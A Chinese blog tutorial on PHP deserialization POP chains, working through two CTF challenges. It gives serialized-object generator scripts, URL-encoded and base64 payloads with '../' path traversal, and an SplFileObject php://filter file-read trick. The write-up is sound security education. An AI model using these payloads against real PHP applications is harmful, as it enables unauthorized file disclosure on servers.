php反序列化学习(中)--pop链的构造

已于 2024-04-24 19:40:12 修改
阅读量1.1k 收藏 16
点赞数 20
文章标签: php反序列化 pop链
于 2024-04-24 17:20:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75120258/article/details/138044140
版权

关于POP链

POP链是⼀种⾯向属性编程,常⽤于构造调⽤链的⽅法。

PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop链则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。在反序列化中,我们能控制的数据就是对象中的属性值(成员变量所以在PHP反序列化中有一种漏洞利用方法叫"面向属性编程"POP( Property Oriented Programming)。
POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的-种payload。

Pop链的基本思路是,通过反序列化攻击,构造出一条“链”,让程序依次执行其中的命令,最终实现攻击者想要的目的。Pop链通常是由多个对象序列化数据组成的,每个对象都包含着下一个对象的引用。当程序反序列化第一个对象时,就会自动解析其中的引用,并继续反序列化下一个对象,以此类推,最终执行攻击者希望执行的代码。

[第五空间 2021]pklovecloud

打开环境,进行代码审计

<?php  
// 包含 flag.php 文件,但不会在此显示其内容
include 'flag.php';

// 定义一个名为 pkshow 的类
class pkshow 
{  
    // 定义一个名为 echo_name 的方法,返回字符串 "Pk very safe^.^"
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

// 定义一个名为 acp 的类
class acp 
{   
    // 声明一个受保护的属性 $cinder 和两个公共属性 $neutron 和 $nova
    protected $cinder;  
    public $neutron;
    public $nova;

    // 构造函数,创建一个 pkshow 对象并将其分配给 $cinder 属性
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  

    // 将对象转换为字符串时调用的魔术方法
    function __toString()      
    {          
        // 如果 $cinder 属性已设置,则返回 $cinder 对象的 echo_name 方法的结果
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

// 定义一个名为 ace 的类
class ace
{    
    // 声明三个公共属性 $filename、$openstack 和 $docker
    public $filename;     
    public $openstack;
    public $docker; 

    // 定义一个名为 echo_name 的方法
    function echo_name()      
    {   
        // 反序列化 $docker 属性并将结果赋值给 $openstack 属性
        $this->openstack = unserialize($this->docker);

        // 将未定义的变量 $heat 赋值给 $openstack->neutron
        $this->openstack->neutron = $heat;

        // 如果 $openstack->neutron 等于 $openstack->nova
        if($this->openstack->neutron === $this->openstack->nova)
        {
            // 构造文件路径
            $file = "./{$this->filename}";

            // 如果能够读取文件内容
            if (file_get_contents($file))         
            {              
                // 返回文件内容
                return file_get_contents($file); 
            }  
            else 
            { 
                // 文件不存在时返回 "keystone lost~"
                return "keystone lost~"; 
            }    
        }
    }  
}  

// 如果 GET 请求中包含参数 pks
if (isset($_GET['pks']))  
{
    // 反序列化 pks 参数并将结果赋值给 $logData 变量
    $logData = unserialize($_GET['pks']);

    // 输出 $logData 变量的内容
    echo $logData; 
} 
else 
{ 
    // 如果没有 pks 参数,则显示当前文件的源代码
    highlight_file(__file__); 
}
?>

这一题我们需要构造pop链,既然要构造pop链,我们就要找到链头和链尾(从链尾在到链头,一步一步的看,这样就思路清晰了)

我们先去找链尾,我们需要通过这个file_get_contents()函数来获得flag。但是如果我们想要触发file_get_contents()函数的条件就是需要触发ace中的echo_name()函数,我们接着找echo_name()函数,在acp中的__toString()魔术方法中找到了echo_name()函数,因此,如果我们要触发ace中的echo_name()函数的话,就需要触发acp中的__toString()魔术方法并使 acp $this->cinder = new ace(),从而调用到echo_name()函数再触发file_get_contents()函数得到flag.php。那么,我们该怎么触发acp中的__toString()魔术方法呢,别忘了,在源代码中,还有一个魔术方法:__construct()魔术方法,acp 实例化时会自动调用 __construct(),我们可以通过__construct这个构造函数去触发_toString方法,成功调用echo_name()函数。最终得到flag。

关于file_get_contents() 函数

file_get_contents() 函数是一个php函数,用于读取文件中的内容并将其作为字符串返回。它接受一个参数,即要读取的文件的路径。 但遇到读大文件操作时,不建议使用。可以考虑curl等方式代替。

__toString()魔术方法

__toString()魔术方法用于在尝试将一个对象转换为字符串时自动调用。当你尝试直接在代码中将一个对象作为字符串输出时,PHP 将会查找该对象是否有定义了 __toString() 方法,如果有,就会自动调用这个方法来返回对象的字符串表示形式。

__construct()魔术方法

__construct()魔术方法是php中常见的魔术方法,用于在创建一个新对象实例时自动调用。它是类的构造函数,负责执行对象的初始化操作,比如设置对象的属性或执行必要的设置。当你使用 new关键字创建一个类的新实例时,PHP会自动调用该类中的 __construct() 方法。

基本思路就是这样,所以我们的pop链为:

acp->__construct() => acp->__toString() => ace->echo_name() => file_get_contents(flag.php)

但是关于这一题我们还有一个点,就是需要满足$this->openstack->neutron === $this->openstack->nova 因为第一次遇见,去看了很对师傅们的WP,学到了几种方法,其中我觉的最简单的也最容易理解的方法是:

别忘了我们还有一个从未出现的变量$heat,我们可以发现$heat变量是没有被赋值的,那么他就是空的,我们既然要满足$this->openstack->neutron === $this->openstack->nova,那让$nova为空不就行了么,因此我们构造php:

<?php
class acp
{
	protected $cinder;  
    public $neutron;
    public $nova=null;
	function __construct()
	{
		$this->cinder = new ace();
	}
}
class ace
{
	public $filename = 'flag.php';     
    public $openstack;
    public $docker;
}
$a = new acp();
echo serialize($a);
?>

构造出来后,我们发现有不可见字符,那我们再对他进行一次url编码就可以了

<?php
class acp
{
	protected $cinder;  
    public $neutron;
    public $nova=null;
	function __construct()
	{
		$this->cinder = new ace();
	}
}
class ace
{
	public $filename = 'flag.php';     
    public $openstack;
    public $docker;
}
$a = new acp();
echo urlencode(serialize($a));
?>

 得到

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

 构造url:

?pks=O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

什么都没有。。。。在源代码里发现了秘密

我们知道了falg的位置,flag在/nssctfasdasdflag里,那我们修改一下filename的值就可以了

<?php
class acp
{
	protected $cinder;  
    public $neutron;
    public $nova=null;
	function __construct()
	{
		$this->cinder = new ace();
	}
}
class ace
{
	public $filename = 'nssctfasdasdflag';     
    public $openstack;
    public $docker;
}
$a = new acp();
echo urlencode(serialize($a));
?>

得到

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22nssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

 嗯。。。。是为什么呢,看了WP才知道,是因为不存在/nssctfasdasdflag,那我们查看一下上一级目录

../nssctfasdasdflag

<?php
class acp
{
	protected $cinder;  
    public $neutron;
    public $nova=null;
	function __construct()
	{
		$this->cinder = new ace();
	}
}
class ace
{
	public $filename = '../nssctfasdasdflag';     
    public $openstack;
    public $docker;
}
$a = new acp();
echo urlencode(serialize($a));
?>

得到

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A19%3A%22..%2Fnssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

得到了flag

[GDOUCTF 2023]反方向的钟

打开环境,代码审计,也是需要构造pop链的一道反序列化题

 <?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

if(isset($_GET['d'])){
    unserialize(base64_decode($_GET['d']));
}
?>

还是和之前一样,我们先从尾巴开始找:

找到了关键点school类中的IPO()方法 echo new $_POST['a']($_POST['b']);

POST请求利用原生类SplFileObject读取文件

接着往后面看,要调用IPO(),就需要在__wake()下,又要先执行hahaha(),接着往上面找hahaha(),在classroom类中找到了hahaha(),需要对三个变量赋值:$this->name != 'one class'、$this->leader->name != 'ing'、$this->leader->rank !='department'则返回为真,可以看见后面两个变量leader指向name和rank的值,name和rank都在teacher类里,因此我们要实例化该类并赋值给leader,$leader=new teacher()

大致思路就是这样,所以我们的pop链为:

teacher->classroom:hahaha()->classroom:__wakeup()->IPO()

接着我们构造php:

<?php
class teacher{
    public $name = 'ing';
    public $rank = 'department';
    private $salary;
}
class classroom{
    public $name = 'one class';
    public $leader;
}
class school{
	public $department;
    public $headmaster = 'ong';
}
$a=new school();
$a->department=new classroom();
$a->department->leader=new teacher();
echo base64_encode(serialize($a));
?>

得到

Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

构造url:

?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

并使用POST传参

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

 

再进行base64解码得到flag

关于SplFileObject

SplFileObject是 PHP 中的一个类,它提供了一个面向对象的接口,用于读取和写入文件。它是标准 PHP 库 (SPL) 的一部分,相比传统的文件处理函数(如 fopen()fwrite() 等),它提供了更多功能和灵活性。

通过 SplFileObject,你可以轻松地迭代文件中的行,读取或写入数据块,操作文件指针,并使用面向对象的语法执行其他文件相关的操作。

去看了很多师傅们的博客,但是感觉不是很懂,感觉这一篇让我又一点点感觉

浅析PHP原生类 - 知乎

是小航呀~
关注
21-5 PHP反序列化漏洞-POP构造
weixin_43263566的博客
01-20 485
举例来说,假设有以下调用关系:A --> B,B --> C,A --> B --> C。在读代码时,会遇到很多干扰函数或代码,这些函数或代码没有任何作用,只会干扰我们的阅读。总之,要想有效地读懂代码,需要对编程语言的语法和常见函数有一定的了解,同时要有耐心和细心,逐行分析代码,找出关键点。方法使用了正则表达式检查,我们需要构造一个恶意的序列化对象,以绕过正则表达式的检测。首先,根据代码的逻辑,我们需要构造一个经过序列化的有效对象,并将其作为。: 这是一个构造函数的魔术方法,在创建类的实例时自动调用。
PHP反序列化构造POP
Lemon's blog
04-03 4660
前言: 最近在刷题的时候发现这个PHP反序列化POP,之前理解的序列化攻击多是在魔术方法出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法,而是在一个类的普通方法。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
PHP反序列化pop构造
Elite的博客
03-28 1031
简单易懂的反序列化pop构造
POP构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4428
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文调用不可访问...
PHP反序列化漏洞POP调用构造
最新发布
YhMjQx的博客
08-29 715
本篇文章主要讲解PHP反序列化漏洞POP调用构造
php反序列化pop构造
m0_62422842的博客
04-06 7847
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
PHP反序列化--pop
2302_79800344的博客
03-18 1627
pop知识是PHP反序列化模块不可或缺的组成部分
php反序列化POP 构造利用
cosmoslin的博客
09-14 2351
POP 构造利用 一、POP简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN的ROP,有时候反序列化一个对象时,由它调用的__wakeup()又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
PHP 魔术方法浅谈
ansong8919的博客
03-23 222
php把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
php反序列化学习 pop构造
oyf3085227433的博客
01-08 1043
PHP CTF pop学习
PHP反序列化构造POP小练习
末初的CSDN博客
05-13 982
一个师傅给的源码,来源不知,就当作小练习记录一下 <?php error_reporting(0); class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); } } .
一道php反序列化题的pop构造
内心不种满鲜花就会长满杂草
05-19 1149
题目代码如下,其像套娃一样,多次对魔术方法进行调用,挺烧脑。根据题目,显然目标是echo $flag。最后提交反序列化字符串,获取flag。最后我们用代码实现pop构造。然后访问,输出反序列化字符串。需要把var改为私有属性。倒退分析后,接着正推。
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2175
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php反序列化漏洞之pop
weixin_60719780的博客
02-08 2381
常用于上层语言构造特定调用的方法,与二进制利用的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN的ROP,有时候反序列化一个对象时,由它调用的__wakeup()又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法调用其他函数(小组件),通过寻找相同名字的函数,再与
反序列化学习——pop构造
m0_73756016的博客
03-10 788
反序列化,我们能控制的数据就是对象的属性值(成员变量所以在PHP反序列化有一种漏洞利用方法叫"面向属性编程"POP( Property Oriented Programming).Poc是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。然后让benben = fast这个类将其反序列化的时候顺理成章调用wakeup。所以要触发wakeup() 必须要反序列化fast这个类。魔术方法触发前提:魔术方法所在类(或对象)被调用。这里如果benben的值为反序列化类sec的结果。
反序列化学习PHP反序列化&POP构造
wz0819529的博客
10-21 3659
反序列化学习(一) 前言 反序列化漏洞的学习贯穿了我的整个网安学习过程,从刚开始参加纳新考核到现在,反序列化的题目一直是难题,挡在学习的路上。 这次刷完了ctfshow的反序列化漏洞的相关题目,打算借这次机会重新总结一遍反序列化漏洞的相关知识。 反序列化漏洞的种类非常的多,在很多语言环境下你都会发现序列化储存信息的方式,所以反序列化漏洞也出现在了各种情况下。 总结一下: PHP反序列化漏洞 session反序列化 Phar反序列化漏洞 Python反序列化漏洞
phppop构造
2301_80913334的博客
03-28 1300
构造pop首先要做的就是找到目标,接着使用倒推法分析代码逻辑,一个一个魔术方法的绕过其可能有一些魔术方法是障眼法需要仔细甄别,还有像例题4一样的有两个文件(一个文件被隐藏)的就需要多尝试一个一个文件的读取。技巧(一般题目):1、目标:echo $flag2、文件:$value = flag.php3、__toString():找echo4、__invoke():找return $***();
WEB攻防-PHP反序列化&POP构造&魔术方法流程&漏洞触发条件&属性修改
siu~
11-10 843
1、PHP-反序列化-应用&识别&函数 2、PHP-反序列化-魔术方法&触发规则 3、PHP-反序列化-联合漏洞&POP构造
php反序列化pop一则
dengzhasong7076的博客
07-27 388
跟随wupco师傅学习 classes.php <?php class OutputFilter { protected $matchPattern; protected $replacement; function __construct($pattern, $repl) { $this->matchPattern = $pattern; $...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值